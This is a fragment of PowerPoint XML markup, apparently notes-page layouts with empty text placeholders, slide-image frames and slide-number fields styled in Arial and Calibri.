                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-12619" lvl="7" marL="3200320" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-12608" lvl="8" marL="3657509" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776662" y="9429750"/>
            <a:ext cx="2890836" cy="496887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45850" lIns="91700" rIns="91700" tIns="45850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr b="0" i="0" lang="zh-TW" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>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5" name="Shape 75"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Shape 76"/>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77" name="Shape 77"/>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SzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="Shape 78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776662" y="9429750"/>
            <a:ext cx="2890836" cy="496887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45850" lIns="91700" rIns="91700" tIns="45850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr b="0" i="0" lang="zh-TW" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>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9" name="Shape 149"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150" name="Shape 150"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25400" y="744537"/>
            <a:ext cx="6618300" cy="3724200"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="120000" w="120000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="120000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120000" y="120000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="120000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151" name="Shape 151"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="4716462"/>
            <a:ext cx="5335500" cy="4467300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152" name="Shape 152"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776662" y="9429750"/>
            <a:ext cx="2890800" cy="496800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45850" lIns="91700" rIns="91700" tIns="45850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>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7" name="Shape 157"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158" name="Shape 158"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25400" y="744537"/>
            <a:ext cx="6618300" cy="3724200"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="120000" w="120000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="120000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120000" y="120000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="120000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159" name="Shape 159"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="4716462"/>
            <a:ext cx="5335500" cy="4467300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160" name="Shape 160"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776662" y="9429750"/>
            <a:ext cx="2890800" cy="496800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45850" lIns="91700" rIns="91700" tIns="45850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>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5" name="Shape 165"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166" name="Shape 166"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25400" y="744537"/>
            <a:ext cx="6618300" cy="3724200"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="120000" w="120000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="120000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120000" y="120000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="120000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167" name="Shape 167"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="4716462"/>
            <a:ext cx="5335500" cy="4467300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168" name="Shape 168"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776662" y="9429750"/>
            <a:ext cx="2890800" cy="496800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45850" lIns="91700" rIns="91700" tIns="45850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>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3" name="Shape 173"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="174" name="Shape 174"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25400" y="744537"/>
            <a:ext cx="6618300" cy="3724200"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="120000" w="120000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="120000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120000" y="120000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="120000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175" name="Shape 175"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="4716462"/>
            <a:ext cx="5335500" cy="4467300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="176" name="Shape 176"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776662" y="9429750"/>
            <a:ext cx="2890800" cy="496800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45850" lIns="91700" rIns="91700" tIns="45850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>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9" name="Shape 179"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="180" name="Shape 180"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25400" y="744537"/>
            <a:ext cx="6618300" cy="3724200"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="120000" w="120000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="120000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120000" y="120000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="120000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181" name="Shape 181"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="4716462"/>
            <a:ext cx="5335500" cy="4467300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182" name="Shape 182"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776662" y="9429750"/>
            <a:ext cx="2890800" cy="496800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45850" lIns="91700" rIns="91700" tIns="45850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>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7" name="Shape 187"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="188" name="Shape 188"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25400" y="744537"/>
            <a:ext cx="6618300" cy="3724200"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="120000" w="120000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="120000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120000" y="120000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="120000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189" name="Shape 189"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="4716462"/>
            <a:ext cx="5335500" cy="4467300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190" name="Shape 190"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776662" y="9429750"/>
            <a:ext cx="2890800" cy="496800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45850" lIns="91700" rIns="91700" tIns="45850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>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95" name="Shape 195"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="196" name="Shape 196"/>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97" name="Shape 197"/>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SzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="198" name="Shape 198"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776662" y="9429750"/>
            <a:ext cx="2890836" cy="496887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45850" lIns="91700" rIns="91700" tIns="45850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr b="0" i="0" lang="zh-TW" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>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03" name="Shape 203"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="204" name="Shape 204"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="4716462"/>
            <a:ext cx="5335587" cy="4467224"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="205" name="Shape 205"/>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61" name="Shape 261"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="262" name="Shape 262"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="4716462"/>
            <a:ext cx="5335587" cy="4467224"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
